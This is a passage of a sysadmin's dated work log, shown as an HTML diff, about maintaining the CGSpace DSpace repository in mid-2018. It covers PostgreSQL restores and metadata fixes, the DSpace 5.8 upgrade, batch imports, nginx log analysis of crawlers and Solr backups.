+  value.contains('€'),
+  value.contains('6g'),
+  value.contains('6m'),
+  value.contains('6d'),
+  value.contains('6e')
+)
+
+

2018-06-13

+
    +
  • Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Robin Buruchara’s items
  • +
  • I used my add-orcid-identifiers-csv.py script:
  • +
+
$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • The contents of 2018-06-13-Robin-Buruchara.csv were:
  • +
+
dc.contributor.author,cg.creator.id
+"Buruchara, Robin",Robin Buruchara: 0000-0003-0934-1218
+"Buruchara, Robin A.",Robin Buruchara: 0000-0003-0934-1218
+
    +
  • On a hunch I checked to see if CGSpace’s bitstream cleanup was working properly and of course it’s broken:
  • +
+
$ dspace cleanup -v
+...
+Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(152402) is still referenced from table "bundle".
+
    +
  • As always, the solution is to clear that primary bitstream ID manually in PostgreSQL:
  • +
+
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);'
+UPDATE 1
+

2018-06-14

+ +

2018-06-24

+
    +
  • I was restoring a PostgreSQL dump on my test machine and found a way to restore the CGSpace dump as the postgres user, but have the owner of the schema be the dspacetest user:
  • +
+
$ dropdb -h localhost -U postgres dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost /tmp/cgspace_2018-06-24.backup
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
+
    +
  • The -O option to pg_restore makes the import process ignore ownership specified in the dump itself, and instead makes the schema owned by the user doing the restore
  • +
  • I always prefer to use the postgres user locally because it’s just easier than remembering the dspacetest user’s password, but then I couldn’t figure out why the resulting schema was owned by postgres
  • +
  • So with this you connect as the postgres superuser and then switch roles to dspacetest (also, make sure this user has superuser privileges before the restore)
  • +
  • Last week Linode emailed me to say that our Linode 8192 instance used for DSpace Test qualified for an upgrade
  • +
  • Apparently they announced some upgrades to most of their plans in 2018-05
  • +
  • After the upgrade I see we have more disk space available in the instance’s dashboard, so I shut the instance down and resized it from 98GB to 160GB
  • +
  • The resize was very quick (less than one minute) and after booting the instance back up I now have 160GB for the root filesystem!
  • +
  • I will move the DSpace installation directory back to the root file system and delete the extra 300GB block storage, as it was actually kinda slow when we put Solr there and now we don’t actually need it anymore because running the production Solr on this instance didn’t work well with 8GB of RAM
  • +
  • Also, the larger instance we’re using for CGSpace will go from 24GB of RAM to 32, and will also get a storage increase from 320GB to 640GB… that means we don’t need to consider using block storage right now!
  • +
  • The smaller instances get increased storage and network speed but I doubt many are actually using much of their current allocations so we probably don’t need to bother with upgrading them
  • +
  • Last week Abenet asked if we could add dc.language.iso to the advanced search filters
  • +
  • There is already a search filter for this field defined in discovery.xml but we aren’t using it, so I quickly enabled and tested it, then merged it to the 5_x-prod branch (#380)
  • +
  • Back to testing the DSpace 5.8 changes from Atmire, I had another issue with SQL migrations:
  • +
+
Caused by: org.flywaydb.core.api.FlywayException: Validate failed. Found differences between applied migrations and available migrations: Detected applied migration missing on the classpath: 5.8.2015.12.03.3
+
    +
  • It took me a while to figure out that this migration is for MQM, which I removed after Atmire’s original advice about the migrations, so we actually need to delete this migration instead of updating it
  • +
  • So I need to make sure to run the following during the DSpace 5.8 upgrade:
  • +
+
-- Delete existing CUA 4 migration if it exists
+delete from schema_version where version = '5.6.2015.12.03.2';
+
+-- Update version of CUA 4 migration
+update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
+
+-- Delete MQM migration since we're no longer using it
+delete from schema_version where version = '5.5.2015.12.03.3';
+
    +
  • After that you can run the migrations manually and then DSpace should work fine:
  • +
+
$ ~/dspace/bin/dspace database migrate ignored
+...
+Done.
+
    +
  • Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis’ items on CGSpace
  • +
  • I used my add-orcid-identifiers-csv.py script:
  • +
+
$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p 'fuuu'
+
    +
  • The contents of 2018-06-24-andy-jarvis-orcid.csv were:
  • +
+
dc.contributor.author,cg.creator.id
+"Jarvis, A.",Andy Jarvis: 0000-0001-6543-0798
+"Jarvis, Andy",Andy Jarvis: 0000-0001-6543-0798
+"Jarvis, Andrew",Andy Jarvis: 0000-0001-6543-0798
+

2018-06-26

+
    +
  • Atmire got back to me to say that we can remove the itemCollectionPlugin and HasBitstreamsSSIPlugin beans from DSpace’s discovery.xml file, as they are used by the Metadata Quality Module (MQM) that we are not using anymore
  • +
  • I removed both those beans and did some simple tests to check item submission, media-filter of PDFs, REST API, but got an error “No matches for the query” when listing records in OAI
  • +
  • This warning appears in the DSpace log:
  • +
+
2018-06-26 16:58:12,052 WARN  org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
+
    +
  • It’s actually only a warning and it also appears in the logs on DSpace Test (which is currently running DSpace 5.5), so I need to keep troubleshooting
  • +
  • Ah, I think I just need to run dspace oai import
  • +
+

2018-06-27

+
    +
  • Vika from CIFOR sent back his annotations on the duplicates for the “CIFOR_May_9” archive import that I sent him last week
  • +
  • I’ll have to figure out how to separate those we’re keeping, deleting, and mapping into CIFOR’s archive collection
  • +
  • First, get the 62 deletes from Vika’s file and remove them from the collection:
  • +
+
$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-delete.txt
+$ wc -l cifor-handle-to-delete.txt
+62 cifor-handle-to-delete.txt
+$ wc -l 10568-92904.csv
+2461 10568-92904.csv
+$ while read line; do sed -i "\#$line#d" 10568-92904.csv; done < cifor-handle-to-delete.txt
+$ wc -l 10568-92904.csv
+2399 10568-92904.csv
+
    +
  • This iterates over the handles for deletion and uses sed with an alternative pattern delimiter of ‘#’ (which must be escaped), because the pattern itself contains a ‘/’
  • +
  • The mapped ones will be difficult because we need their internal IDs in order to map them, and there are 50 of them:
  • +
+
$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-map.txt
+$ wc -l cifor-handle-to-map.txt
+50 cifor-handle-to-map.txt
+
    +
  • I can either get them from the database, or programmatically export the metadata using dspace metadata-export -i 10568/xxxxx
  • +
  • Oooh, I can export the items one by one, concatenate them together, remove the headers, and extract the id and collection columns using csvkit:
  • +
+
$ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done < /tmp/cifor-handle-to-map.txt
+$ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 > map-to-cifor-archive.csv
+
    +
  • Then I can use Open Refine to add the “CIFOR Archive” collection to the mappings
  • +
  • Importing the 2398 items via dspace metadata-import ends up with a Java garbage collection error, so I think I need to do it in batches of 1,000
  • +
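  • A simple way to do the batching (just a sketch, and it assumes none of the metadata values contain embedded newlines; otherwise csvkit would be safer) is to split the CSV on line count while keeping the header in each chunk:
$ head -n1 10568-92904.csv > /tmp/cifor-header.csv
$ tail -n +2 10568-92904.csv | split -l 1000 - /tmp/cifor-batch-
$ for f in /tmp/cifor-batch-*; do cat /tmp/cifor-header.csv "$f" > "${f}.csv"; done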
  • After deleting the 62 duplicates, mapping the 50 items from elsewhere in CGSpace, and uploading 2,398 unique items, there are a total of 2,448 items added in this batch
  • +
  • I’ll let Abenet take one last look and then move them to CGSpace
  • +
+

2018-06-28

+
    +
  • DSpace Test appears to have crashed last night
  • +
  • There is nothing in the Tomcat or DSpace logs, but I see the following in dmesg -T:
  • +
+
[Thu Jun 28 00:00:30 2018] Out of memory: Kill process 14501 (java) score 701 or sacrifice child
+[Thu Jun 28 00:00:30 2018] Killed process 14501 (java) total-vm:14926704kB, anon-rss:5693608kB, file-rss:0kB, shmem-rss:0kB
+[Thu Jun 28 00:00:30 2018] oom_reaper: reaped process 14501 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
    +
  • Look over IITA’s IITA_Jan_9_II_Ab collection from earlier this month on DSpace Test
  • +
  • Bosede fixed a few things (and seems to have removed many French IITA subjects like AMÉLIORATION DES PLANTES and SANTÉ DES PLANTES)
  • +
  • I still see at least one issue with author affiliations, and I didn’t bother to check the AGROVOC subjects because it’s such a mess anyways
  • +
  • I suggested that IITA provide an updated list of subjects to us so we can include their controlled vocabulary in CGSpace, which would also make it easier to do automated validation
  • +

July, 2018

+ +
+

2018-07-01

+
    +
  • I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:
  • +
+
$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+
    +
  • During the mvn package stage on the 5.8 branch I kept getting issues with java running out of memory:
  • +
+
There is insufficient memory for the Java Runtime Environment to continue.
+
    +
  • As the machine only has 8GB of RAM, I reduced the Tomcat memory heap from 5120m to 4096m so I could try to allocate more to the build process:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=dspacetest.cgiar.org -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
+
    +
  • Then I stopped the Tomcat 7 service, ran the ant update, and manually ran the old and ignored SQL migrations:
  • +
+
$ sudo su - postgres
+$ psql dspace
+...
+dspace=# begin;
+BEGIN
+dspace=# \i Atmire-DSpace-5.8-Schema-Migration.sql
+DELETE 0
+UPDATE 1
+DELETE 1
+dspace=# commit
+dspace=# \q
+$ exit
+$ dspace database migrate ignored
+
    +
  • After that I started Tomcat 7 and DSpace seems to be working; now I need to tell our colleagues to try stuff and report any issues they have
  • +
+

2018-07-02

+ +

2018-07-03

+
    +
  • Finally finish with the CIFOR Archive records (a total of 2448): +
      +
    • I mapped the 50 items that were duplicates from elsewhere in CGSpace into CIFOR Archive
    • +
    • I did one last check of the remaining 2398 items and found eight that have a cg.identifier.doi that links to some URL other than a DOI, so I moved those to cg.identifier.url and cg.identifier.googleurl as appropriate
    • +
    • Also, thirteen items had a DOI in their citation, but did not have a cg.identifier.doi field, so I added those
    • +
    • Then I imported those 2398 items in two batches (to deal with memory issues):
    • +
    +
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive.csv
+$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive2.csv
+
    +
  • I noticed there are many items that use HTTP instead of HTTPS for their Google Books URL, and some that are missing the scheme entirely:
  • +
+
dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
+ count
+-------
+   785
+dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
+ count
+-------
+     4
+
    +
  • I think I should fix that as well as some other garbage values like “test” and “dspace.ilri.org” etc:
  • +
+
dspace=# begin;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
+UPDATE 785
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
+UPDATE 4
+dspace=# update metadatavalue set text_value='https://books.google.com/books?id=meF1CLdPSF4C' where resource_type_id=2 and metadata_field_id=222 and text_value='meF1CLdPSF4C';
+UPDATE 1
+dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=222 and metadata_value_id in (2299312, 10684, 10700, 996403);
+DELETE 4
+dspace=# commit;
+
    +
  • I am testing DSpace 5.8 with PostgreSQL 9.6 and Tomcat 8.5.32 (instead of my usual 7.0.88), and for some reason I get autowire errors on Catalina startup:
  • +
+
03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
+ java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
+	at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
+	at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4792)
+	at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5256)
+	at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:150)
+	at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:754)
+	at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:730)
+	at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:734)
+	at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:629)
+	at org.apache.catalina.startup.HostConfig$DeployDescriptor.run(HostConfig.java:1839)
+	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+	at java.lang.Thread.run(Thread.java:748)
+Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
+
    +
  • Gotta check that out later…
  • +
+

2018-07-04

+
    +
  • I verified that the autowire error indeed only occurs on Tomcat 8.5, but the application works fine on Tomcat 7
  • +
  • I have raised this in the DSpace 5.8 compatibility ticket on Atmire’s tracker
  • +
  • Abenet wants me to add “United Kingdom government” to the sponsors on CGSpace so I created a ticket to track it (#381)
  • +
  • Also, Udana wants me to add “Enhancing Sustainability Across Agricultural Systems” to the WLE Phase II research themes so I created a ticket to track that (#382)
  • +
  • I need to try to finish this DSpace 5.8 business first because I have too many branches with cherry-picks going on right now!
  • +
+

2018-07-06

+
    +
  • CCAFS want me to add “PII-FP2_MSCCCAFS” to their Phase II project tags on CGSpace (#383)
  • +
  • I’ll do it in a batch with all the other metadata updates next week
  • +
+

2018-07-08

+
    +
  • I was tempted to do the Linode instance upgrade on CGSpace (linode18), but after looking closely at the system backups I noticed that Solr isn’t being backed up to S3
  • +
  • I apparently noticed this—and fixed it!—in 2016-07, but it doesn’t look like the backup has been updated since then!
  • +
  • It looks like I added Solr to the backup_to_s3.sh script, but that script is not even being used (s3cmd is run directly from root’s crontab)
  • +
  • For now I have just initiated a manual S3 backup of the Solr data:
  • +
+
# s3cmd sync --delete-removed /home/backup/solr/ s3://cgspace.cgiar.org/solr/
+
    +
  • But I need to add this to cron!
  • +
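  • Something like this in root’s crontab should do it (the schedule and the s3cmd path here are assumptions, not what I have actually deployed):
# m h dom mon dow   command
0 4 * * * /usr/bin/s3cmd sync --delete-removed /home/backup/solr/ s3://cgspace.cgiar.org/solr/ > /dev/null 2>&1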
  • I wonder if I should convert some of the cron jobs to systemd services / timers…
  • +
  • I sent a note to all our users on Yammer to ask them about possible maintenance on Sunday, July 14th
  • +
  • Abenet wants to be able to search by journal title (dc.source) in the advanced Discovery search so I opened an issue for it (#384)
  • +
  • I regenerated the list of names for all our ORCID iDs using my resolve-orcids.py script:
  • +
+
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > /tmp/2018-07-08-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt -d
+
    +
  • But after comparing to the existing list of names I didn’t see much change, so I just ignored it
  • +
+

2018-07-09

+
    +
  • Uptime Robot said that CGSpace was down for two minutes early this morning but I don’t see anything in Tomcat logs or dmesg
  • +
  • Uptime Robot said that CGSpace was down for two minutes again later in the day, and this time I saw a memory error in Tomcat’s catalina.out:
  • +
+
Exception in thread "http-bio-127.0.0.1-8081-exec-557" java.lang.OutOfMemoryError: Java heap space
+
    +
  • I’m not sure if it’s the same error, but I see this in DSpace’s solr.log:
  • +
+
2018-07-09 06:25:09,913 ERROR org.apache.solr.servlet.SolrDispatchFilter @ null:java.lang.RuntimeException: java.lang.OutOfMemoryError: Java heap space
+
    +
  • I see a strange error around that time in dspace.log.2018-07-08:
  • +
+
2018-07-09 06:23:43,510 ERROR com.atmire.statistics.SolrLogThread @ IOException occured when talking to server at: http://localhost:8081/solr/statistics
+org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr/statistics
+
    +
  • But not sure what caused that…
  • +
  • I got a message from Linode tonight that CPU usage was high on CGSpace for the past few hours around 8PM GMT
  • +
  • Looking in the nginx logs I see the top ten IP addresses active today:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "09/Jul/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+   1691 40.77.167.84
+   1701 40.77.167.69
+   1718 50.116.102.77
+   1872 137.108.70.6
+   2172 157.55.39.234
+   2190 207.46.13.47
+   2848 178.154.200.38
+   4367 35.227.26.162
+   4387 70.32.83.92
+   4738 95.108.181.88
+
    +
  • Of those, all except 70.32.83.92 and 50.116.102.77 are NOT re-using their Tomcat sessions, for example from the XMLUI logs:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-07-09
+4435
+
    +
  • 95.108.181.88 appears to be Yandex, so I dunno why it’s creating so many sessions, as its user agent should match Tomcat’s Crawler Session Manager Valve
  • +
  • 70.32.83.92 is on MediaTemple but I’m not sure who it is. They are mostly hitting REST so I guess that’s fine
  • +
  • 35.227.26.162 doesn’t declare a user agent and is on Google Cloud, so I should probably mark them as a bot in nginx
  • +
  • 178.154.200.38 is Yandex again
  • +
  • 207.46.13.47 is Bing
  • +
  • 157.55.39.234 is Bing
  • +
  • 137.108.70.6 is our old friend CORE bot
  • +
  • 50.116.102.77 doesn’t declare a user agent and lives on HostGator, but mostly just hits the REST API so I guess that’s fine
  • +
  • 40.77.167.84 is Bing again
  • +
  • Interestingly, the first time I saw 35.227.26.162 was on 2018-06-08
  • +
  • I’ve added 35.227.26.162 to the bot tagging logic in the nginx vhost
  • +
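  • The actual logic is in our nginx config (managed in the Ansible infrastructure scripts), but the general idea is a map on the client address that we can then treat as a bot, roughly like this sketch (not the real config):
# sketch only: flag requests from this address so they get the bot treatment
map $remote_addr $bot_by_ip {
    default          0;
    35.227.26.162    1;
}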
+

2018-07-10

+
    +
  • Add “United Kingdom government” to sponsors (#381)
  • +
  • Add “Enhancing Sustainability Across Agricultural Systems” to WLE Phase II Research Themes (#382)
  • +
  • Add “PII-FP2_MSCCCAFS” to CCAFS Phase II Project Tags (#383)
  • +
  • Add journal title (dc.source) to Discovery search filters (#384)
  • +
  • All were tested and merged to the 5_x-prod branch and will be deployed on CGSpace this coming weekend when I do the Linode server upgrade
  • +
  • I need to get them onto the 5.8 testing branch too, either via cherry-picking or by rebasing after we finish testing Atmire’s 5.8 pull request (#378)
  • +
  • Linode sent an alert about CPU usage on CGSpace again, about 13:00UTC
  • +
  • These are the top ten users in the last two hours:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Jul/2018:(11|12|13)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     81 193.95.22.113
+     82 50.116.102.77
+    112 40.77.167.90
+    117 196.190.95.98
+    120 178.154.200.38
+    215 40.77.167.96
+    243 41.204.190.40
+    415 95.108.181.88
+    695 35.227.26.162
+    697 213.139.52.250
+
    +
  • Looks like 213.139.52.250 is Moayad testing his new CGSpace visualization thing:
  • +
+
213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] "GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0" 200 53750 "http://localhost:4200/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
+
    +
  • He said there was a bug that caused his app to request a bunch of invalid URLs
  • +
  • I’ll have to keep an eye on this and see how their platform evolves
  • +
+

2018-07-11

+
    +
  • Skype meeting with Peter and Addis CGSpace team +
      +
    • We need to look at doing the dc.rights stuff again, which we last worked on in 2018-01 and 2018-02
    • +
    • Abenet suggested that we do a controlled vocabulary for the authors, perhaps with the top 1,500 or so on CGSpace?
    • +
    • Peter told Sisay to test this controlled vocabulary
    • +
    • Discuss meeting in Nairobi in October
    • +
    +
  • +
+

2018-07-12

+
    +
  • Uptime Robot said that CGSpace went down a few times last night, around 10:45 PM and 12:30 AM
  • +
  • Here are the top ten IPs from last night and this morning:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "11/Jul/2018:22" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     48 66.249.64.91
+     50 35.227.26.162
+     57 157.55.39.234
+     59 157.55.39.71
+     62 147.99.27.190
+     82 95.108.181.88
+     92 40.77.167.90
+     97 183.128.40.185
+     97 240e:f0:44:fa53:745a:8afe:d221:1232
+   3634 208.110.72.10
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "12/Jul/2018:00" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     25 216.244.66.198
+     38 40.77.167.185
+     46 66.249.64.93
+     56 157.55.39.71
+     60 35.227.26.162
+     65 157.55.39.234
+     83 95.108.181.88
+     87 66.249.64.91
+     96 40.77.167.90
+   7075 208.110.72.10
+
    +
  • We have never seen 208.110.72.10 before… so that’s interesting!
  • +
  • The user agent for these requests is: Pcore-HTTP/v0.44.0
  • +
  • A brief Google search doesn’t turn up any information about what this bot is, but lots of users complaining about it
  • +
  • This bot does make a lot of requests all through the day, although it seems to re-use its Tomcat session:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+  17098 208.110.72.10
+# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-11
+1161
+# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-12
+1885
+
    +
  • I think the problem is that, despite the bot requesting robots.txt, it almost exclusively requests dynamic pages from /discover:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep -o -E "GET /(browse|discover|search-filter)" | sort -n | uniq -c | sort -rn
+  13364 GET /discover
+    993 GET /search-filter
+    804 GET /browse
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep robots
+208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] "GET /robots.txt HTTP/1.1" 200 1301 "https://cgspace.cgiar.org/robots.txt" "Pcore-HTTP/v0.44.0"
+
    +
  • So this bot is just like Baiduspider, and I need to add it to the nginx rate limiting
  • +
  • I’ll also add it to Tomcat’s Crawler Session Manager Valve to force the re-use of a common Tomcat session for all crawlers just in case
  • +
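  • For reference, the valve is configured in Tomcat’s server.xml and takes a regex of user agents, so adding Pcore-HTTP would look roughly like this (the real regex we use is longer, so this is only a sketch):
<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
       crawlerUserAgents=".*[bB]ot.*|.*Yandex.*|.*Pcore-HTTP.*" />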
  • Generate a list of all affiliations in CGSpace to send to Mohamed Salem to compare with the list on MEL (sorting the list by most occurrences):
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv header
+COPY 4518
+dspace=# \q
+$ csvcut -c 1 < /tmp/affiliations.csv > /tmp/affiliations-1.csv
+
    +
  • We also need to discuss standardizing our countries and comparing our ORCID iDs
  • +
+

2018-07-13

+
    +
  • Generate a list of affiliations for Peter and Abenet to go over so we can batch correct them before we deploy the new data visualization dashboard:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
+COPY 4518
+

2018-07-15

+
    +
  • Run all system updates on CGSpace, add latest metadata changes from last week, and start the Linode instance upgrade
  • +
  • After the upgrade I see we have more disk space available in the instance’s dashboard, so I shut the instance down and resized it from 392GB to 650GB
  • +
  • The resize was very quick (less than one minute) and after booting the instance back up I now have 631GB for the root filesystem (with 267GB available)!
  • +
  • Peter had asked a question about how mapped items are displayed in the Altmetric dashboard
  • +
  • For example, 10568/82810 is mapped to four collections, but only shows up in one “department” in their dashboard
  • +
  • Altmetric help said that according to OAI that item is only in one department
  • +
  • I noticed that indeed there was only one collection listed, so I forced an OAI re-import on CGSpace:
  • +
+
$ dspace oai import -c
+OAI 2.0 manager action started
+Clearing index
+Index cleared
+Using full import.
+Full import
+100 items imported so far...
+200 items imported so far...
+...
+73900 items imported so far...
+Total: 73925 items
+Purging cached OAI responses.
+OAI 2.0 manager action ended. It took 697 seconds.
+
    +
  • Now I see four collections in OAI for that item!
  • +
  • I need to ask the dspace-tech mailing list if the nightly OAI import catches the case of old items that have had metadata or mappings change
  • +
  • ICARDA sent me a list of the ORCID iDs they have in the MEL system and it looks like almost 150 are new and unique to us!
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
+1020
+$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
+1158
+
    +
  • I combined the two lists and regenerated the names for all of our ORCID iDs using my resolve-orcids.py script:
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-07-15-orcid-ids.txt
+$ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolved-orcids.txt -d
+
    +
  • Then I added the XML formatting for controlled vocabularies, sorted the list with GNU sort in vim via % !sort and then checked the formatting with tidy:
  • +
+
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • I will check with the CGSpace team to see if they want me to add these to CGSpace
  • +
  • Help Udana from WLE understand some Altmetrics concepts
  • +
+

2018-07-18

+
    +
  • ICARDA sent me another refined list of ORCID iDs so I sorted and formatted them into our controlled vocabulary again
  • +
  • Participate in call with IWMI and WLE to discuss Altmetric, CGSpace, and social media
  • +
  • I told them that they should try to be including the Handle link on their social media shares because that’s the only way to get Altmetric to notice them and associate them with their DOIs
  • +
  • I suggested that we should have a wider meeting about this, and that I would post that on Yammer
  • +
